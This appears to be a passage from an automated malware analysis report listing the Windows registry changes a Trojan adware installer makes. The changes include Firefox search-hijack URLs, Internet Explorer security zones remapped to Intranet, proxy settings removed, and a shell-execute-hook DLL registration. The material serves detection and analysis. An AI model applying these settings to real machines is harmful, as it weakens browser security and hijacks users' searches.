[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 29 58 D2 57 A0 E4 18 4F 29 D9 F6 04 11 22 77"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\ckehack\DEBUG]
"Trace Level"

The process ckehack.html5:2032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"UID" = "ADCA2197E17DE989DA91F56322BE0AB0"

[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"hp" = "http://d2ucfwpxlh3zh3.cloudfront.net/?ts=AHEqC3UsBH8sC0..&v=20160718&uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&mode=ffsengext"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"SPName" = "hohosearch"

[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"s" = "HtTp://d2jeaw7c5nmwo6.cloudfront.net/gkozn0k4?uid=%s&update0=version,%s&update1=sys,%s&update4=ref,%s&update5=mode,%s&update6=sys0,%s&update7=sys1,%s&update8=sys2,%s&update9=sys3,%s&update10=sys4,%s"

[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"UID" = "ADCA2197E17DE989DA91F56322BE0AB0"

[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"SP" = "http://d2ucfwpxlh3zh3.cloudfront.net/chrome.php?uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&q={searchTerms}&ts=AHEqC3UsBH8sC0..&v=20160718&mode=ffsengext"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"s" = "HtTp://d2jeaw7c5nmwo6.cloudfront.net/gkozn0k4?uid=%s&update0=version,%s&update1=sys,%s&update4=ref,%s&update5=mode,%s&update6=sys0,%s&update7=sys1,%s&update8=sys2,%s&update9=sys3,%s&update10=sys4,%s"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"tab" = "http://d2ucfwpxlh3zh3.cloudfront.net/?ts=AHEqC3UsBH8sC0..&v=20160718&uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&mode=ffsengext"
"SP" = "http://d2ucfwpxlh3zh3.cloudfront.net/chrome.php?uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&q={searchTerms}&ts=AHEqC3UsBH8sC0..&v=20160718&mode=ffsengext"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"surl" = "http://d2ucfwpxlh3zh3.cloudfront.net/chrome.php?uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&ts=AHEqC3UsBH8sC0..&v=20160718&mode=ffexttoolbar&q="

[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"surl" = "http://d2ucfwpxlh3zh3.cloudfront.net/chrome.php?uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&ts=AHEqC3UsBH8sC0..&v=20160718&mode=ffexttoolbar&q="

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 59 2E 1E 9D DB 08 4E 38 1B DC F1 F2 1B B8 9C"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"SPName" = "hohosearch"
"tab" = "http://d2ucfwpxlh3zh3.cloudfront.net/?ts=AHEqC3UsBH8sC0..&v=20160718&uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&mode=ffsengext"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"hp" = "http://d2ucfwpxlh3zh3.cloudfront.net/?ts=AHEqC3UsBH8sC0..&v=20160718&uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&mode=ffsengext"

The process nop.exe:1512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 64 A8 0F 9E 15 B8 FB F7 3D D2 89 25 4F AA A9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process 1.tmp.exe:1340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 B4 B5 9A 60 BD 66 BF A9 06 E5 3D 38 69 57 7B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"amisetup7548__10235_il2.exe" = "X-Series Install Package"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process 1.tmp.exe:1836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 77 2B EA EF BB 9B 67 8D AB F9 80 A8 61 70 E5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"amisetup7604__99999_il2.exe" = "X-Series Install Package"

[HKCU\Software\InstallPath\Status]
"NationZoom" = "N"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process 1.tmp.exe:2732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F C2 A3 79 77 97 46 C8 D9 A0 4F 85 78 6E E8 E8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"amisetup7816__16582_il2.exe" = "X-Series Install Package"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process ping.exe:560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 81 74 47 6D B1 95 4B 8C EB 04 05 03 8B 92 8B"

The process ping.exe:1008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 5B C3 2B C6 47 28 1C 54 78 93 A1 89 49 C6 E1"

The process %original file name%.exe:600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 E7 BD DE 37 05 62 21 75 1D 10 ED 9E EE 5C 06"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\WindowsUpdater]
"Count" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process regsvr32.exe:1500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 90 2A D3 C3 DA 40 D1 96 CF C3 8E E2 8A E1 92"

[HKCR\CLSID\{98C066AB-D735-4339-9E52-A34875141B56}\InProcServer32]
"(Default)" = "%Documents and Settings%\%current user%\Cookies\matile.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"EnableShellExecuteHooks" = "1"

[HKCR\CLSID\{98C066AB-D735-4339-9E52-A34875141B56}\InProcServer32]
"ThreadingModel" = "Apartment"

The process amisetup7604__99999_il2.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}]
"(Default)" = "IBoot"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\telexes.compiles\CurVer]
"(Default)" = "telexes.compiles.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7604__99999_il2.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Version]
"(Default)" = "1.0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
"(Default)" = "{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7604__99999_il2.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\TypeLib]
"(Default)" = "{de2deba6-37b4-4d2f-8a78-56effa49ba84}"

[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0]
"(Default)" = "InstallerLib"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"tmnqck.exe" = "tmnqck"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup7604__99999_il2.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"nop.exe" = "nop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\VersionIndependentProgID]
"(Default)" = "telexes.compiles"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCR\telexes.compiles.1\CLSID]
"(Default)" = "{4cf1ec1d-2055-4a46-b248-11fb57f52868}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1468883313"

[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 8A 9E ED 93 07 C3 00 70 7D EF EB 1E 0F 52 F9"

[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\ProgID]
"(Default)" = "telexes.compiles.1"

[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

